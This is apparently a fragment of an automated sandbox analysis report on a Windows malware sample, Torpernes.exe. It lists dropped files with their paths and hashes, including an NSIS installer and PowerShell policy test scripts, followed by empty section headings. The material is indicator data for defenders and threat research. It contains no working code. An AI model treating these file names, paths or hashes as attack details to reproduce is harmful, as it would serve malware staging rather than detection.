C:\Users\user\AppData\Local\Temp\Contentious.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	ECC4FF0EE7D123F0E90587EA3A7B9AE3	70E6F747F9BAE57619817BEB11F836FA8A873726	1E0A46FD7B7B0706D4D5918BA666ABDCCCC67BE4BE89874B5CB2CA9EA8B12A83
C:\Users\user\AppData\Local\Temp\Contentious.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem	ASCII text, with very long lines (54418), with no line terminators	B77B0DEE3BF32770AF375C4C87E19478	D97F7CF179F27860AC856437F256D8A473497472	05CB2B925D951BF1348C00B0B69B21E9EA7F8C4F3022636E89EED64C043BAF78
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Sildefdnings.pre	data	6CA54912856A504C6D0347BD9B57DDFD	7C9354362785D249DF664498EAD9AE7246F244FE	0E91233482A61EB85E81D38C4E838E7B2157A27431CF6180BDBD4B995C35AAFA
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\genfortl.kom	data	1CB1238607E8954A7923966A49CDB3E0	BFF6A1E896BB0BE28E1BFCFD0094BCD36078D849	6A76541EE87E4E7E547F500D01CC9D50EE681DBF067FE8D4E5735F5BD22AC999
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\leucocythaemia.lob	data	5318799C0891E41C4824B117782D972C	B7708ECD85A69E6158EA05A6B5BDC1B8CE826199	254A5A9B8B3F20A38A993C62D3F16EE3F7D98176769F97C58248C27C77A4C032
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\teknonom.txt	ASCII text, with CRLF line terminators	17EACC32277AC454B9E9981F5E3EA80B	6D18F25A482B59AB8AC0D485D9594A147320B396	C03BC7EDD150C4DC8A88F160D8863489F09AACEE6F9CE5071E0D962332522A6C
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\discontiguous.alk	data	176BA5DE5FE97864B7468DD8BCE8C38E	01804C24EDC45329980BF040FCF8EFFFAF4B471D	84DFBA8A9B3F62629795FA225C836FDCD3708595325E98F6248E3C72A4DD6C9B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqmzalva.ybv.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1fjdjsr.czb.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Windows Analysis Report Torpernes.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Torpernes.exe

Malware Threat Intel
Provided by